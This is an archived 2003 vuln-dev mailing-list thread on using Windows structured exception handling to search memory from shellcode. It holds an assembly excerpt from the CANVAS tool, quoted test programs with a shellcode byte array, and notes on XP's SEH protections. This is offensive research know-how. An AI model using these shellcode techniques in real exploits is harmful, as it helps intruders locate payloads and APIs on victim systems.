Re: Win32: Using SEH to search memory

dave_at_immunitysec.com
Date: 09/25/03

  • Next message: 3APA3A: "reverse shell shellcode for Windows" 
    Date: 25 Sep 2003 18:05:48 -0000
To: vuln-dev@securityfocus.com
    ('binary' encoding is not supported, stored as-is) In-Reply-To: <3F72E421.7080604@edelweb.fr>

    From CANVAS's win32search.c, this is what you are looking for.

    Dave Aitel
    Immunity, Inc.
    CANVAS: All the hard work is done for you.

    //push the address of our exception handler
    push %eax
    //we are the last handler, so we push -1
    push $-1
    //move it all into place...
    mov %esp,%fs:(0)

    //Now we have to adjust our thread information block to reflect we may be anywhere in memory
    //As of Windows XP SP1, you cannot have your exception handler itself on the stack - but most versions of windows check to make sure your exception blcck is on the stack.
    addl $0xc, %esp
    movl %esp,%fs:(4)
    subl $0xc,%esp
    //now we fix the bottom of thread stack to be right after our SEH block
    movl %esp,%fs:(8)

    >Received: (qmail 25948 invoked from network); 25 Sep 2003 17:00:33 -0000
    >Received: from outgoing3.securityfocus.com (205.206.231.27)
    > by mail.securityfocus.com with SMTP; 25 Sep 2003 17:00:33 -0000
    >Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])
    > by outgoing3.securityfocus.com (Postfix) with QMQP
    > id CEF76A36DE; Thu, 25 Sep 2003 10:47:29 -0600 (MDT)
    >Mailing-List: contact vuln-dev-help@securityfocus.com; run by ezmlm
    >Precedence: bulk
    >List-Id: <vuln-dev.list-id.securityfocus.com>
    >List-Post: <mailto:vuln-dev@securityfocus.com>
    >List-Help: <mailto:vuln-dev-help@securityfocus.com>
    >List-Unsubscribe: <mailto:vuln-dev-unsubscribe@securityfocus.com>
    >List-Subscribe: <mailto:vuln-dev-subscribe@securityfocus.com>
    >Delivered-To: mailing list vuln-dev@securityfocus.com
    >Delivered-To: moderator for vuln-dev@securityfocus.com
    >Received: (qmail 4351 invoked from network); 25 Sep 2003 06:32:09 -0000
    >Message-ID: <3F72E421.7080604@edelweb.fr>
    >Date: Thu, 25 Sep 2003 14:48:33 +0200
    >From: "Nicolas RUFF (lists)" <ruff.lists@edelweb.fr>
    >Organization: EdelWeb
    >User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624
    >X-Accept-Language: en, en-us, fr, fr-FR
    >MIME-Version: 1.0
    >To: Bob Askew <bdaskew@hotmail.com>, vuln-dev@securityfocus.com
    >Subject: Re: Win32: Using SEH to search memory
    >References: <BAY7-F748R8RhjPtdYd00018857@hotmail.com>
    >In-Reply-To: <BAY7-F748R8RhjPtdYd00018857@hotmail.com>
    >X-Enigmail-Version: 0.75.0.0
    >X-Enigmail-Supports: pgp-inline, pgp-mime
    >Content-Type: text/plain; charset=us-ascii; format=flowed
    >Content-Transfer-Encoding: 7bit
    >
    >Windows XP Exception Handler has new protections, such as :
    >- clearing registers before transferring control to the handler code
    >AND
    >- do not transfer control to a handler code located on the stack
    >
    >Cf . http://std.dkuug.dk/jtc1/sc22/wg21/docs/papers/2003/n1462.pdf
    >
    >If you run your code on a Windows 2000, it should work fine I guess.
    >
    >Regards,
    >- Nicolas RUFF
    >-----------------------------------
    >Security Consultant
    >EdelWeb (http://www.edelweb.fr/)
    >-----------------------------------
    >
    >> I'm trying to search through memory using structured exception handling
    >> to avoid crashing when accessing bad memory. Various buffer overflow
    >> exploits have used this technique for locating the address of
    >> GetProcAdd() or for locating shellcode planted in memory.
    >>
    >> I have an example written in inline assembly and compiled with Visual
    >> Studio on XP. It implements seh and searches through memory just fine.
    >> My handler handles the memory access violations. (Example 1 code below)
    >> However, if I stick my handler on the stack, then Windows doesn't send
    >> the exception to my handler. (Example 2 code below)
    >>
    >> Does anyone have any suggestions as to what I might be doing wrong? Does
    >> Windows care where a handler lives in memory? Can anyone recommend a
    >> good reference for implementing seh in shellcode?
    >>
    >>
    >> Example 1:
    >> *****************************************
    >>
    >> #include<stdio.h>
    >>
    >> //simple test for SEH with handler
    >>
    >> void main()
    >> {
    >> unsigned int cint = 0;
    >>
    >> __asm{
    >>
    >> jmp gethandler
    >> start:
    >> xor ebx,ebx
    >> xor ecx,ecx
    >> push dword ptr fs:[ecx]
    >> mov dword ptr fs:[ecx],esp
    >> search:
    >> inc ebx
    >> cmp dword ptr[ebx],0x00000000 ;//causes exception
    >>
    >> //exception cleanup
    >> xor ecx,ecx ;
    >> mov eax,[ESP] ; // Get pointer to previous record
    >> mov FS:[ecx], eax ; // Install previous record
    >> add esp, 8 ; //clean handler & fs[0] off stack
    >> jmp printit
    >>
    >> gethandler:
    >> call start
    >> handler:
    >> push ebp
    >> mov ebp,esp
    >> push ebx
    >> mov ebx,[ebp+10h]
    >> add ebx,0xa4
    >> inc dword ptr[ebx] ;//increment ebx
    >> xor eax,eax
    >> pop ebx
    >> mov esp,ebp
    >> pop ebp
    >> ret
    >> printit:
    >> mov [cint],ebx
    >> }
    >> printf("Last ebx = %x\n",cint);
    >>
    >> }
    >>
    >> Example 2:
    >> *****************************************
    >>
    >> #include<stdio.h>
    >>
    >> //simple test for SEH with handler located on stack
    >>
    >> void main()
    >> {
    >> unsigned int cint = 0;
    >>
    >> char unsigned bytes[] =
    >> "\xEB\x1B" // jmp gethandler
    >> //start:
    >> "\x33\xDB" // xor ebx,ebx
    >> "\x33\xC9" // xor ecx,ecx
    >> "\x64\xFF\x31" // push dword ptr fs:[ecx]
    >> "\x64\x89\x21" // mov dword ptr fs:[ecx],esp
    >> //search:
    >> "\x43" // inc ebx
    >> "\x83\x3B\x00" // cmp dword ptr [ebx],0
    >> //SEH cleanup
    >> "\x33\xC9" // xor ecx,ecx
    >> "\x8B\x04\x24" // mov eax,dword ptr [esp]
    >> "\x64\x89\x01" // mov dword ptr fs:[ecx],eax
    >> "\x83\xC4\x08" // add esp,8
    >> "\xEB\x1B" // jmp printit
    >> //gethandler:
    >> "\xE8\xE0\xFF\xFF\xFF" // call start
    >> //handler:
    >> "\x55" // push ebp
    >> "\x8B\xEC" // mov ebp,esp
    >> "\x53" // push ebx
    >> "\x8B\x5D\x10" // mov ebx,dword ptr [ebp+10h]
    >> "\x81\xC3\xA4\x00\x00\x00"//add ebx,0A4h
    >> "\xFF\x03" // inc dword ptr [ebx]
    >> "\x33\xC0" // xor eax,eax
    >> "\x5B" // pop ebx
    >> "\x8B\xE5" // mov esp,ebp
    >> "\x5D" // pop ebp
    >> "\xC3" // ret
    >> //printit: (clean exit?)
    >> "\xff\xd2"; //jump edx
    >>
    >> __asm{
    >> lea eax,bytes
    >> lea edx,printit
    >> jmp eax
    >> printit:
    >> mov [cint],ebx
    >> }
    >>
    >> printf("Last ebx = %x\n",cint); //probably will never make it here.
    >>
    >> }
    >>
    >> _________________________________________________________________
    >> High-speed Internet access as low as $29.95/month (depending on the
    >> local service providers in your area). Click here.
    >> https://broadband.msn.com
    >>
    >>
    >>
    >
    >

  • Next message: 3APA3A: "reverse shell shellcode for Windows"

    Relevant Pages

    • Re: Total virtual memory available to user on win32
      ... Read about the addresses supported by the various Intel & AMD cpus. ... Virtual memory is the entire 4GB mapping, or the parts of it that Windows ... application the next stack page is not mapped to physical memory, ...
      (microsoft.public.win32.programmer.kernel)
    • Re: Runing out of Memory
      ... I have 2 GB of RAM. ... I have many windows open, and with my PC running for a few days, all of sudden I am no longer able to open applications, to alt+tab, minimize or maximize window, etc. ... What is strange is that I have 1 GB of physical memory available, and only using les than 30% of PF. ... there is a VERY special segment of memory called the 'stack' the stack is used for storing pointers and handles a lot of transient processing activities. ...
      (microsoft.public.windowsxp.general)
    • Re: Stack ?
      ... A stack is a section of memory reserved by a program or the system. ... Windows help - www.rickrogers.org ... > Many thanks Malke but I have read the article and it is only relevant up ...
      (microsoft.public.windowsxp.general)
    • Re: Win32: Using SEH to search memory
      ... Windows XP Exception Handler has new protections, ... clearing registers before transferring control to the handler code ... If you run your code on a Windows 2000, it should work fine I guess. ... > GetProcAddor for locating shellcode planted in memory. ...
      (Vuln-Dev)
    • thread stack size
      ... I would like to know how big is the default stack size of a thread in .Net? ... Does windows treat a thread in .Net as a process and hence ... allocate 1 Mb of memory for each thread? ... Kovan ...
      (microsoft.public.dotnet.framework)